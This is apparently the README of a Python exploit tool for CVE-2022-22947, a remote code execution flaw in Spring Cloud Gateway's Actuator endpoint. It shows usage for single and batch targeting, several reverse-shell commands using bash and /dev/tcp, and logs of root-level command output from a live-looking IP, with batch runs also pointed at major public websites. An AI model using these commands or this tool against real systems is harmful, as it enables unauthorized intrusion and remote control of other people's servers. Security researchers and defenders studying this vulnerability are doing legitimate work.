
एक स्क्रिप्ट जिसे अकेले या बैच में सत्यापित किया जा सकता है, और रिवर्स शेल भी प्राप्त कर सकती है।
खतरे का स्तर: उच्च जोखिम
POC/EXP स्थिति: सार्वजनिक
CNVD क्रमांक: CNNVD-2022-16402
CVE क्रमांक: CVE-2022-22947
Spring Cloud Gateway में एक दूरस्थ कोड निष्पादन भेद्यता मौजूद है। यह भेद्यता Spring Cloud Gateway एप्लिकेशन के Actuator एंडपॉइंट पर होती है, जो सक्षम, उजागर और असुरक्षित होने पर कोड इंजेक्शन हमलों के लिए असुरक्षित है। हमलावर इस भेद्यता का उपयोग दुर्भावनापूर्ण रूप से ऐसे अनुरोध बनाकर कर सकता है जो दूरस्थ होस्ट पर मनमाना कोड निष्पादन की अनुमति देते हैं।
-h सहायता जानकारी देखें
-u URL लक्ष्य निर्दिष्ट करें
-c निष्पादित करने के लिए कमांड निर्दिष्ट करें, डिफ़ॉल्ट रूप से id निष्पादित करें
-f लक्ष्य URL फ़ाइल निर्दिष्ट करें
1. एकल लक्ष्य सत्यापन
विधि 1:
E:\pocs>python cve-2022-22947.py
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
请输入一个目标url地址:http://123.58.236.76:8484
请输入想要执行的命令,默认执行id:whoami
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
विधि 2:
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
2. बैच सत्यापन
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
[-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
3. रिवर्स शेल
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
image-20220519233354807
image-20220519233429912